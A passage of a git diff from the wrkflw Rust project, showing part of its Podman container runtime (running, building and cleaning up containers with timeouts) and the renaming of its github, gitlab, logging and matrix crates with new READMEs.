||||
("dotnet", Some(ver)) => format!("mcr.microsoft.com/dotnet/sdk:{}", ver),
|
||||
("rust", Some(ver)) => format!("rust:{}", ver),
|
||||
(lang, Some(ver)) => format!("{}:{}", lang, ver),
|
||||
(lang, None) => lang.to_string(),
|
||||
};
|
||||
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
/// Execute a podman command with proper error handling and timeout
|
||||
async fn execute_podman_command(
|
||||
&self,
|
||||
args: &[&str],
|
||||
input: Option<&str>,
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
let timeout_duration = std::time::Duration::from_secs(360); // 6 minutes timeout
|
||||
|
||||
let result = tokio::time::timeout(timeout_duration, async {
|
||||
let mut cmd = Command::new("podman");
|
||||
cmd.args(args);
|
||||
|
||||
if input.is_some() {
|
||||
cmd.stdin(Stdio::piped());
|
||||
}
|
||||
cmd.stdout(Stdio::piped()).stderr(Stdio::piped());
|
||||
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Running Podman command: podman {}",
|
||||
args.join(" ")
|
||||
));
|
||||
|
||||
let mut child = cmd.spawn().map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to spawn podman command: {}", e))
|
||||
})?;
|
||||
|
||||
// Send input if provided
|
||||
if let Some(input_data) = input {
|
||||
if let Some(stdin) = child.stdin.take() {
|
||||
use tokio::io::AsyncWriteExt;
|
||||
let mut stdin = stdin;
|
||||
stdin.write_all(input_data.as_bytes()).await.map_err(|e| {
|
||||
ContainerError::ContainerExecution(format!(
|
||||
"Failed to write to stdin: {}",
|
||||
e
|
||||
))
|
||||
})?;
|
||||
stdin.shutdown().await.map_err(|e| {
|
||||
ContainerError::ContainerExecution(format!("Failed to close stdin: {}", e))
|
||||
})?;
|
||||
}
|
||||
}
|
||||
|
||||
let output = child.wait_with_output().await.map_err(|e| {
|
||||
ContainerError::ContainerExecution(format!("Podman command failed: {}", e))
|
||||
})?;
|
||||
|
||||
Ok(ContainerOutput {
|
||||
stdout: String::from_utf8_lossy(&output.stdout).to_string(),
|
||||
stderr: String::from_utf8_lossy(&output.stderr).to_string(),
|
||||
exit_code: output.status.code().unwrap_or(-1),
|
||||
})
|
||||
})
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(output) => output,
|
||||
Err(_) => {
|
||||
wrkflw_logging::error("Podman operation timed out after 360 seconds");
|
||||
Err(ContainerError::ContainerExecution(
|
||||
"Operation timed out".to_string(),
|
||||
))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub fn is_available() -> bool {
|
||||
// Use a very short timeout for the entire availability check
|
||||
let overall_timeout = std::time::Duration::from_secs(3);
|
||||
|
||||
// Spawn a thread with the timeout to prevent blocking the main thread
|
||||
let handle = std::thread::spawn(move || {
|
||||
// Use safe FD redirection utility to suppress Podman error messages
|
||||
match fd::with_stderr_to_null(|| {
|
||||
// First, check if podman CLI is available as a quick test
|
||||
if cfg!(target_os = "linux") || cfg!(target_os = "macos") {
|
||||
// Try a simple podman version command with a short timeout
|
||||
let process = std::process::Command::new("podman")
|
||||
.arg("version")
|
||||
.arg("--format")
|
||||
.arg("{{.Version}}")
|
||||
.stdout(std::process::Stdio::null())
|
||||
.stderr(std::process::Stdio::null())
|
||||
.spawn();
|
||||
|
||||
match process {
|
||||
Ok(mut child) => {
|
||||
// Set a very short timeout for the process
|
||||
let status = std::thread::scope(|_| {
|
||||
// Try to wait for a short time
|
||||
for _ in 0..10 {
|
||||
match child.try_wait() {
|
||||
Ok(Some(status)) => return status.success(),
|
||||
Ok(None) => {
|
||||
std::thread::sleep(std::time::Duration::from_millis(100))
|
||||
}
|
||||
Err(_) => return false,
|
||||
}
|
||||
}
|
||||
// Kill it if it takes too long
|
||||
let _ = child.kill();
|
||||
false
|
||||
});
|
||||
|
||||
if !status {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug("Podman CLI is not available");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Try to run a simple podman command to check if the daemon is responsive
|
||||
let runtime = match tokio::runtime::Builder::new_current_thread()
|
||||
.enable_all()
|
||||
.build()
|
||||
{
|
||||
Ok(rt) => rt,
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!(
|
||||
"Failed to create runtime for Podman availability check: {}",
|
||||
e
|
||||
));
|
||||
return false;
|
||||
}
|
||||
};
|
||||
|
||||
runtime.block_on(async {
|
||||
match tokio::time::timeout(std::time::Duration::from_secs(2), async {
|
||||
let mut cmd = Command::new("podman");
|
||||
cmd.args(["info", "--format", "{{.Host.Hostname}}"]);
|
||||
cmd.stdout(Stdio::null()).stderr(Stdio::null());
|
||||
|
||||
match tokio::time::timeout(std::time::Duration::from_secs(1), cmd.output())
|
||||
.await
|
||||
{
|
||||
Ok(Ok(output)) => {
|
||||
if output.status.success() {
|
||||
true
|
||||
} else {
|
||||
wrkflw_logging::debug("Podman info command failed");
|
||||
false
|
||||
}
|
||||
}
|
||||
Ok(Err(e)) => {
|
||||
wrkflw_logging::debug(&format!("Podman info command error: {}", e));
|
||||
false
|
||||
}
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug("Podman info command timed out after 1 second");
|
||||
false
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug("Podman availability check timed out");
|
||||
false
|
||||
}
|
||||
}
|
||||
})
|
||||
}) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Podman availability",
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
// Manual implementation of join with timeout
|
||||
let start = std::time::Instant::now();
|
||||
|
||||
while start.elapsed() < overall_timeout {
|
||||
if handle.is_finished() {
|
||||
return match handle.join() {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning("Podman availability check thread panicked");
|
||||
false
|
||||
}
|
||||
};
|
||||
}
|
||||
std::thread::sleep(std::time::Duration::from_millis(50));
|
||||
}
|
||||
|
||||
wrkflw_logging::warning(
|
||||
"Podman availability check timed out, assuming Podman is not available",
|
||||
);
|
||||
false
|
||||
}
|
||||
|
||||
// Add container to tracking
|
||||
pub fn track_container(id: &str) {
|
||||
if let Ok(mut containers) = RUNNING_CONTAINERS.lock() {
|
||||
containers.push(id.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
// Remove container from tracking
|
||||
pub fn untrack_container(id: &str) {
|
||||
if let Ok(mut containers) = RUNNING_CONTAINERS.lock() {
|
||||
containers.retain(|c| c != id);
|
||||
}
|
||||
}
|
||||
|
||||
// Clean up all tracked resources
|
||||
pub async fn cleanup_resources() {
|
||||
// Use a global timeout for the entire cleanup process
|
||||
let cleanup_timeout = std::time::Duration::from_secs(5);
|
||||
|
||||
match tokio::time::timeout(cleanup_timeout, cleanup_containers()).await {
|
||||
Ok(result) => {
|
||||
if let Err(e) = result {
|
||||
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
|
||||
}
|
||||
}
|
||||
Err(_) => wrkflw_logging::warning(
|
||||
"Podman cleanup timed out, some resources may not have been removed",
|
||||
),
|
||||
}
|
||||
}
|
||||
|
||||
// Clean up all tracked containers
|
||||
pub async fn cleanup_containers() -> Result<(), String> {
|
||||
// Getting the containers to clean up should not take a long time
|
||||
let containers_to_cleanup =
|
||||
match tokio::time::timeout(std::time::Duration::from_millis(500), async {
|
||||
match RUNNING_CONTAINERS.try_lock() {
|
||||
Ok(containers) => containers.clone(),
|
||||
Err(_) => {
|
||||
wrkflw_logging::error("Could not acquire container lock for cleanup");
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(containers) => containers,
|
||||
Err(_) => {
|
||||
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
|
||||
vec![]
|
||||
}
|
||||
};
|
||||
|
||||
if containers_to_cleanup.is_empty() {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up {} containers",
|
||||
containers_to_cleanup.len()
|
||||
));
|
||||
|
||||
// Process each container with a timeout
|
||||
for container_id in containers_to_cleanup {
|
||||
// First try to stop the container
|
||||
let stop_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["stop", &container_id])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match stop_result {
|
||||
Ok(Ok(output)) => {
|
||||
if output.status.success() {
|
||||
wrkflw_logging::debug(&format!("Stopped container: {}", container_id));
|
||||
} else {
|
||||
wrkflw_logging::warning(&format!("Error stopping container {}", container_id));
|
||||
}
|
||||
}
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error stopping container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
|
||||
}
|
||||
}
|
||||
|
||||
// Then try to remove it
|
||||
let remove_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["rm", &container_id])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match remove_result {
|
||||
Ok(Ok(output)) => {
|
||||
if output.status.success() {
|
||||
wrkflw_logging::debug(&format!("Removed container: {}", container_id));
|
||||
} else {
|
||||
wrkflw_logging::warning(&format!("Error removing container {}", container_id));
|
||||
}
|
||||
}
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error removing container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
|
||||
}
|
||||
}
|
||||
|
||||
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
|
||||
untrack_container(&container_id);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ContainerRuntime for PodmanRuntime {
|
||||
async fn run_container(
|
||||
&self,
|
||||
image: &str,
|
||||
cmd: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
// Print detailed debugging info
|
||||
wrkflw_logging::info(&format!("Podman: Running container with image: {}", image));
|
||||
|
||||
let timeout_duration = std::time::Duration::from_secs(360); // 6 minutes timeout
|
||||
|
||||
// Run the entire container operation with a timeout
|
||||
match tokio::time::timeout(
|
||||
timeout_duration,
|
||||
self.run_container_inner(image, cmd, env_vars, working_dir, volumes),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::error("Podman operation timed out after 360 seconds");
|
||||
Err(ContainerError::ContainerExecution(
|
||||
"Operation timed out".to_string(),
|
||||
))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
// Add a timeout for pull operations
|
||||
let timeout_duration = std::time::Duration::from_secs(30);
|
||||
|
||||
match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Pull of image {} timed out, continuing with existing image",
|
||||
image
|
||||
));
|
||||
// Return success to allow continuing with existing image
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
// Add a timeout for build operations
|
||||
let timeout_duration = std::time::Duration::from_secs(120); // 2 minutes timeout for builds
|
||||
|
||||
match tokio::time::timeout(timeout_duration, self.build_image_inner(dockerfile, tag)).await
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::error(&format!(
|
||||
"Building image {} timed out after 120 seconds",
|
||||
tag
|
||||
));
|
||||
Err(ContainerError::ImageBuild(
|
||||
"Operation timed out".to_string(),
|
||||
))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn prepare_language_environment(
|
||||
&self,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
additional_packages: Option<Vec<String>>,
|
||||
) -> Result<String, ContainerError> {
|
||||
// Check if we already have a customized image for this language and version
|
||||
let key = format!("{}-{}", language, version.unwrap_or("latest"));
|
||||
if let Some(customized_image) = Self::get_language_specific_image("", language, version) {
|
||||
return Ok(customized_image);
|
||||
}
|
||||
|
||||
// Create a temporary Dockerfile for customization
|
||||
let temp_dir = tempfile::tempdir().map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to create temp directory: {}", e))
|
||||
})?;
|
||||
|
||||
let dockerfile_path = temp_dir.path().join("Dockerfile");
|
||||
let mut dockerfile_content = String::new();
|
||||
|
||||
// Add language-specific setup based on the language
|
||||
match language {
|
||||
"python" => {
|
||||
let base_image =
|
||||
version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v));
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" build-essential \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content.push_str(&format!("RUN pip install {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
"node" => {
|
||||
let base_image =
|
||||
version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v));
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" build-essential \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content.push_str(&format!("RUN npm install -g {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
"java" => {
|
||||
let base_image = version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
|
||||
format!("eclipse-temurin:{}", v)
|
||||
});
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" maven \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
}
|
||||
"go" => {
|
||||
let base_image =
|
||||
version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v));
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" git \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content.push_str(&format!("RUN go install {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
"dotnet" => {
|
||||
let base_image = version
|
||||
.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
|
||||
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
|
||||
});
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content
|
||||
.push_str(&format!("RUN dotnet tool install -g {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
"rust" => {
|
||||
let base_image =
|
||||
version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v));
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" build-essential \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content.push_str(&format!("RUN cargo install {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
_ => {
|
||||
return Err(ContainerError::ContainerStart(format!(
|
||||
"Unsupported language: {}",
|
||||
language
|
||||
)));
|
||||
}
|
||||
}
|
||||
|
||||
// Write the Dockerfile
|
||||
std::fs::write(&dockerfile_path, dockerfile_content).map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to write Dockerfile: {}", e))
|
||||
})?;
|
||||
|
||||
// Build the customized image
|
||||
let image_tag = format!("wrkflw-{}-{}", language, version.unwrap_or("latest"));
|
||||
self.build_image(&dockerfile_path, &image_tag).await?;
|
||||
|
||||
// Store the customized image
|
||||
Self::set_language_specific_image("", language, version, &image_tag);
|
||||
|
||||
Ok(image_tag)
|
||||
}
|
||||
}
|
||||
|
||||
// Implementation of internal methods
|
||||
impl PodmanRuntime {
|
||||
async fn run_container_inner(
|
||||
&self,
|
||||
image: &str,
|
||||
cmd: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
wrkflw_logging::debug(&format!("Running command in Podman: {:?}", cmd));
|
||||
wrkflw_logging::debug(&format!("Environment: {:?}", env_vars));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
|
||||
// Generate a unique container name
|
||||
let container_name = format!("wrkflw-{}", uuid::Uuid::new_v4());
|
||||
|
||||
// Build the podman run command and store temporary strings
|
||||
let working_dir_str = working_dir.to_string_lossy().to_string();
|
||||
let mut env_strings = Vec::new();
|
||||
let mut volume_strings = Vec::new();
|
||||
|
||||
// Prepare environment variable strings
|
||||
for (key, value) in env_vars {
|
||||
env_strings.push(format!("{}={}", key, value));
|
||||
}
|
||||
|
||||
// Prepare volume mount strings
|
||||
for (host_path, container_path) in volumes {
|
||||
volume_strings.push(format!(
|
||||
"{}:{}",
|
||||
host_path.to_string_lossy(),
|
||||
container_path.to_string_lossy()
|
||||
));
|
||||
}
|
||||
|
||||
let mut args = vec!["run", "--name", &container_name, "-w", &working_dir_str];
|
||||
|
||||
// Only use --rm if we don't want to preserve containers on failure
|
||||
// When preserve_containers_on_failure is true, we skip --rm so failed containers remain
|
||||
if !self.preserve_containers_on_failure {
|
||||
args.insert(1, "--rm"); // Insert after "run"
|
||||
}
|
||||
|
||||
// Add environment variables
|
||||
for env_string in &env_strings {
|
||||
args.push("-e");
|
||||
args.push(env_string);
|
||||
}
|
||||
|
||||
// Add volume mounts
|
||||
for volume_string in &volume_strings {
|
||||
args.push("-v");
|
||||
args.push(volume_string);
|
||||
}
|
||||
|
||||
// Add the image
|
||||
args.push(image);
|
||||
|
||||
// Add the command
|
||||
args.extend(cmd);
|
||||
|
||||
// Track the container (even though we use --rm, track it for consistency)
|
||||
track_container(&container_name);
|
||||
|
||||
// Execute the command
|
||||
let result = self.execute_podman_command(&args, None).await;
|
||||
|
||||
// Handle container cleanup based on result and settings
|
||||
match &result {
|
||||
Ok(output) => {
|
||||
if output.exit_code == 0 {
|
||||
// Success - always clean up successful containers
|
||||
if self.preserve_containers_on_failure {
|
||||
// We didn't use --rm, so manually remove successful container
|
||||
let cleanup_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["rm", &container_name])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match cleanup_result {
|
||||
Ok(Ok(cleanup_output)) => {
|
||||
if !cleanup_output.status.success() {
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Failed to remove successful container {}",
|
||||
container_name
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => wrkflw_logging::debug(&format!(
|
||||
"Timeout removing successful container {}",
|
||||
container_name
|
||||
)),
|
||||
}
|
||||
}
|
||||
// If not preserving, container was auto-removed with --rm
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Failed container
|
||||
if self.preserve_containers_on_failure {
|
||||
// Failed and we want to preserve - don't clean up but untrack from auto-cleanup
|
||||
wrkflw_logging::info(&format!(
|
||||
"Preserving failed container {} for debugging (exit code: {}). Use 'podman exec -it {} bash' to inspect.",
|
||||
container_name, output.exit_code, container_name
|
||||
));
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Failed but we don't want to preserve - container was auto-removed with --rm
|
||||
untrack_container(&container_name);
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(_) => {
|
||||
// Command failed to execute properly - clean up if container exists and not preserving
|
||||
if !self.preserve_containers_on_failure {
|
||||
// Container was created with --rm, so it should be auto-removed
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Container was created without --rm, try to clean it up since execution failed
|
||||
let cleanup_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["rm", "-f", &container_name])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match cleanup_result {
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!(
|
||||
"Cleaned up failed execution container {}",
|
||||
container_name
|
||||
)),
|
||||
_ => wrkflw_logging::debug(&format!(
|
||||
"Failed to clean up execution failure container {}",
|
||||
container_name
|
||||
)),
|
||||
}
|
||||
untrack_container(&container_name);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
match &result {
|
||||
Ok(output) => {
|
||||
if output.exit_code != 0 {
|
||||
wrkflw_logging::info(&format!(
|
||||
"Podman command failed with exit code: {}",
|
||||
output.exit_code
|
||||
));
|
||||
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::debug(&format!("STDERR: {}", output.stderr));
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Podman execution error: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
async fn pull_image_inner(&self, image: &str) -> Result<(), ContainerError> {
|
||||
let args = vec!["pull", image];
|
||||
let output = self.execute_podman_command(&args, None).await?;
|
||||
|
||||
if output.exit_code != 0 {
|
||||
return Err(ContainerError::ImagePull(format!(
|
||||
"Failed to pull image {}: {}",
|
||||
image, output.stderr
|
||||
)));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image_inner(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
let context_dir = dockerfile.parent().unwrap_or(Path::new("."));
|
||||
let dockerfile_str = dockerfile.to_string_lossy().to_string();
|
||||
let context_dir_str = context_dir.to_string_lossy().to_string();
|
||||
let args = vec!["build", "-f", &dockerfile_str, "-t", tag, &context_dir_str];
|
||||
|
||||
let output = self.execute_podman_command(&args, None).await?;
|
||||
|
||||
if output.exit_code != 0 {
|
||||
return Err(ContainerError::ImageBuild(format!(
|
||||
"Failed to build image {}: {}",
|
||||
tag, output.stderr
|
||||
)));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
|
||||
// Public accessor functions for testing
|
||||
#[cfg(test)]
|
||||
pub fn get_tracked_containers() -> Vec<String> {
|
||||
if let Ok(containers) = RUNNING_CONTAINERS.lock() {
|
||||
containers.clone()
|
||||
} else {
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
@@ -1,13 +1,18 @@
|
||||
[package]
|
||||
name = "github"
|
||||
name = "wrkflw-github"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "github functionality for wrkflw"
|
||||
description = "GitHub API integration for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Add other crate dependencies as needed
|
||||
models = { path = "../models" }
|
||||
# Internal crates
|
||||
wrkflw-models.workspace = true
|
||||
|
||||
# External dependencies from workspace
|
||||
serde.workspace = true
|
||||
|
||||
23
crates/github/README.md
Normal file
23
crates/github/README.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## wrkflw-github
|
||||
|
||||
GitHub integration helpers used by `wrkflw` to list/trigger workflows.
|
||||
|
||||
- **List workflows** in `.github/workflows`
|
||||
- **Trigger workflow_dispatch** events over the GitHub API
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_github::{get_repo_info, trigger_workflow};
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let info = get_repo_info()?;
|
||||
println!("{}/{} (default branch: {})", info.owner, info.repo, info.default_branch);
|
||||
|
||||
// Requires GITHUB_TOKEN in env
|
||||
trigger_workflow("ci", Some("main"), None).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
Notes: set `GITHUB_TOKEN` with the `workflow` scope; only public repos are supported out-of-the-box.
|
||||
@@ -1,13 +1,18 @@
|
||||
[package]
|
||||
name = "gitlab"
|
||||
name = "wrkflw-gitlab"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "gitlab functionality for wrkflw"
|
||||
description = "GitLab API integration for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
wrkflw-models.workspace = true
|
||||
|
||||
# External dependencies
|
||||
lazy_static.workspace = true
|
||||
|
||||
23
crates/gitlab/README.md
Normal file
23
crates/gitlab/README.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## wrkflw-gitlab
|
||||
|
||||
GitLab integration helpers used by `wrkflw` to trigger pipelines.
|
||||
|
||||
- Reads repo info from local git remote
|
||||
- Triggers pipelines via GitLab API
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_gitlab::{get_repo_info, trigger_pipeline};
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let info = get_repo_info()?;
|
||||
println!("{}/{} (default branch: {})", info.namespace, info.project, info.default_branch);
|
||||
|
||||
// Requires GITLAB_TOKEN in env (api scope)
|
||||
trigger_pipeline(Some("main"), None).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
Notes: looks for `.gitlab-ci.yml` in the repo root when listing pipelines.
|
||||
@@ -1,13 +1,18 @@
|
||||
[package]
|
||||
name = "logging"
|
||||
name = "wrkflw-logging"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "logging functionality for wrkflw"
|
||||
description = "Logging functionality for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
wrkflw-models.workspace = true
|
||||
|
||||
# External dependencies
|
||||
chrono.workspace = true
|
||||
|
||||
22
crates/logging/README.md
Normal file
22
crates/logging/README.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## wrkflw-logging
|
||||
|
||||
Lightweight in-memory logging with simple levels for TUI/CLI output.
|
||||
|
||||
- Thread-safe, timestamped messages
|
||||
- Level filtering (Debug/Info/Warning/Error)
|
||||
- Pluggable into UI for live log views
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_logging::{info, warning, error, LogLevel, set_log_level, get_logs};
|
||||
|
||||
set_log_level(LogLevel::Info);
|
||||
info("starting");
|
||||
warning("be careful");
|
||||
error("boom");
|
||||
|
||||
for line in get_logs() {
|
||||
println!("{}", line);
|
||||
}
|
||||
```
|
||||
@@ -1,13 +1,18 @@
|
||||
[package]
|
||||
name = "matrix"
|
||||
name = "wrkflw-matrix"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "matrix functionality for wrkflw"
|
||||
description = "Matrix job parallelization for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
wrkflw-models.workspace = true
|
||||
|
||||
# External dependencies
|
||||
indexmap.workspace = true
|
||||
|
||||
20
crates/matrix/README.md
Normal file
20
crates/matrix/README.md
Normal file
@@ -0,0 +1,20 @@
|
||||
## wrkflw-matrix
|
||||
|
||||
